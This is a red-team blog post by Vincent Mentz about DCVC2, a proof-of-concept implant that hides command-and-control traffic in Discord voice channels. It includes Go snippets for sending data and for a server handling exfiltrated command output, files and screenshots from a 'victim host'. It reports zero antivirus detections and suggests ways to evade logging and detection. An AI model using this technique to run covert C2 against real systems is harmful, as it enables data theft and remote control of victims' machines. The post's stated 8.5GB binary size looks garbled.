top of page
  • Writer's pictureVincent Mentz

Using Discord's Voice Channel for C2 Operations

April 25th, 2023 By Vincent Mentz
Download: DCVC2


Many malware authors have attempted to utilize Discord for Command and Control operations, each replicating each other in some way, shape, or form. Most commonly, Discord malware authors utilize the basic functionality of Discord like text chats to communicate to their bot or file upload and storage capabilities. This is accomplished by generating a bot through a Discord user's account and utilizing the Discord API while hosting data on Discord's CDN. These bots can interact just like normal users but have many added features which allow automation of tasks via webhooks and the Discord API. Because I love esoteric and novel malware, I decided to try my hand at building a simple Discord based implant which leverages a less common transport - voice chat.

Discord voice chat operates over the Real-Time Transport (RTP) protocol and although I've never even interacted with RTP at the protocol level, I was not deterred. My objective was simple, learn what it would take to successfully send and receive an RTP packet with arbitrary data attached through Discord, and be able to build multi operating system (Windows/Linux/OSX) compatible payloads that require no extra steps other than a user double-clicking or executing the payload via some other method e.g injecting shellcode. This seemed difficult initially because while writing this agent, I was simultaneously learning Golang (hence the chicken scratch code) and using this as an exercise to grow my capabilities. I was right and wrong, but boy was this fun!

Adventure Time:

My first step whenever diving into a new objective is to check if anyone else has already created what I'm wanting to create. This will typically determine how I plan to proceed. After doing some hunting, I found nothing relating to leveraging Discord voice chat for anything other than playing music. My next step was to see if there were any existent Golang libraries that I might leverage to make this a quicker development cycle. Sure enough, a search for a Discord Golang library popped up and its claim to have full Discord API interoperability was enticing enough for me to sink my teeth into this as a starting point.

DiscordGo is a Go package that provides low level bindings to the Discord chat client API. DiscordGo has nearly complete support for all of the Discord API endpoints, websocket interface, and voice interface.

Sending Data:

Many Discord bots will use the voice interface to play music or queue audio snippets of some sort. I began to search the library for the logic which implemented the voice channel interactions. I quickly found a code snippet that plays an airhorn when a specific command such as '!airhorn' is entered in a text channel in the same Discord server (code is located here). This snippet allows you to play any audio queue you want after encoding an mp3 file with FFmpeg. After you have prepare a ".dca" formatted audio file, the code snippet will load the file into a int16 chunked buffer then pass the buffer to an Opus wrapper which will send the packets over voice chat. Structuring the data properly is the most important step to send RTP packets over Discord's voice chat.

I needed to strip the airhorn code snippet down to bare bones because rather than audio queues, I needed to send arbitrary data. Deconstructing the code as much as I could led me to stripping the main.go sample to a single function. This function was the playSound function which I modified to look like so:

func playSound(s *discordgo.Session, guildID, channelID string) {
   vc, _ := s.ChannelVoiceJoin(guildID, channelID, false, true)
   i := 0
   for _, h := range chunks {
      tmp = append(tmp, h)
      for _, chunk := range tmp {
         size := [][]byte{[]byte(info + delimiter)}
         size_new := bytes.Join(size, nil)
         size_chunk := chunk_buffer(size_new, 990)
         new_chunk := append(size_chunk, chunk)
         a := bytes.Join(new_chunk, nil)
         vc.OpusSend <- a
         tmp = make([][]byte, 0)
         fmt.Println("Sent Chunk ", i, " / ", len(chunks))
         if i == len(chunks) {
            fmt.Println(info + " Has been sent!")

By deconstructing the code and gaining an understanding of how the data in the audio buffer was structured, I was able to digest any data then package that in the Opus wrapper and send it across Discord's voice chat! This was a neat moment because normally when I'm developing, I don't hear the result....

Me and the bot in the voice channel. Press play below to enter the Matrix....

Sitting in this voice chat and running my data transmission results in a surreal Matrix-esque experience which sounds like data "should" sound going over the wire. 🤣Have a listen!

Receiving Data:

Sending data was half the challenge, receiving it and making sense of it was also interesting. Looking through the DiscordGO library revealed yet another gem to help us out here :). This code snippet makes use of "listening" in a voice channel to save a ten second recording. This recording gets saved to ".ogg" files based on the audio source (more than one user might be in the voice channel). According to the readme, it is possible to uniquely identify each account transmitting data based on their SSRC. I didn't implement DCVC2 in a multi-agent capacity but this would be a good exercise for the reader. The goal would be to identify multiple agents that join the voice channel and parse their incoming data streams uniquely (*cough cough* make a pull request if you do this).

Another challenge of this project is that Discord uses RTP over UDP meaning packets are broadcasted at a max of 96 kbps in no specific order. Writing an agent which operates over UDP is like trying to spit a mouth full of water into the entry hole of a deflated balloon from 10 inches away. You're going to spill a lot of water, or in this instance lose a bunch of packets during transmission. Because of this issue, I found it necessary to track which chunks of data were making it across the wire and in what sequence. I incorporated some rudimentary tracking of the chunks by prepending some data to the packets sent. I used this same method to identify what type of data was being transmitted: file transfer, screenshot, or a shell command. This helped keep the integrity of the data intact.

I stripped down the "listening" code to reduce any necessary bloat. I was able to reduce the listener to only require the voice channel join code and a simple loop which processes any RTP packets being received. This meant that the listener/server stays joined in the voice channel at all times instead of joining momentarily to listen. I followed the same logic for the agent so that commands could be captured from the server, executed on the victim host, then results broadcasted back to the server. Here is a snippet from the DCVC2 server which handles incoming RTP packets.

func handleVoice(c chan *discordgo.Packet) {
   for p := range c {
      data := strings.Split(string(p.Opus), "|||")
      if data[0] == "Run-Command" {
         fmt.Println("\n" + data[1])
      } else if data[0] == "Download" {
         f, _ := os.OpenFile(data[1], os.O_APPEND|os.O_WRONLY|os.O_CREATE, 0600)
      } else if data[0] == "Screenshot" {
         f, _ := os.OpenFile(data[1], os.O_APPEND|os.O_WRONLY|os.O_CREATE, 0600)

Agent Functionality:

Now that I could send and receive data, it was time to add some basic functionality considering it is an "agent" after all :D. I mentioned earlier that three functionalities were added which were file transfer, screenshot, and shell commands. There is nothing fancy happening under the hood for any of these things. The file transfer uses Go's "ioutil.ReadFile" function to read file data from the victim host and shove it into little 950 byte chunks to send over. The server uses "os.OpenFile(data[1], os.O_APPEND|os.O_WRONLY|os.O_CREATE, 0600)" to write to the server's local disk. To execute screenshots, I found an intuitive library which will screenshot every display connected to the victim host. This library made screenshotting a breeze, the same concept of reading into memory and sending results over the wire was applied. Finally, executing shell commands is once again very rudimentary and uses Go's "exec.Command" function passing in ("cmd", "/C", command) to run commands. I know this method of command execution is not good for red teaming so feel free to implement something more sophisticated and make a pull request!


With the three basic capabilities baked in and working smoothly, I felt that I took this proof of concept far enough for the time being. With the C2 communication happening entirely over Discord voice without the need to have the Discord client installed, I am very pleased with the result. With that said, I would personally refrain from using Discord as a command and control server because of its speed limitations and logging (recording of voice conversations) however you may find it useful for various other operations. I really wanted to create this to inspire myself and others to view strange channels as opportunity for C2 communication.

Closing Thoughts:

Do I think it's worth it to expand upon what I've built?

A resounding yes. If I had the bandwidth, I'd consider adding much more functionality to both the server and agent such as multi-agent operability and better methods of command execution. It really wouldn't be too difficult to adapt other Golang tools to this technique, I'd encourage anyone to do so! I also think that this has potential for SOCKS proxying which would be a really cool addition to the project.

Does this get detected by EDR/XDR?

I don't have access to any top of the line XDR's at the moment but currently the is 0/26 detections. This may sound impressive but when a payload has very little sophistication, it is highly unlikely to get detected by anything really. The compilation of this payload also results in an 8.5GB file which could easily be reduced by running it through a tool like Garble.

What ways could this be improved?

-The biggest thing would be implementing end to end encryption. This would neuter any attempts of Discord logging the voice conversation.

-Take this method and apply it to a more robust C2 like Cobalt Strike, Sliver, Havoc, etc.

-Multiplayer and multi-agent operability


Vincent Mentz - @sm00v

378 views0 comments
bottom of page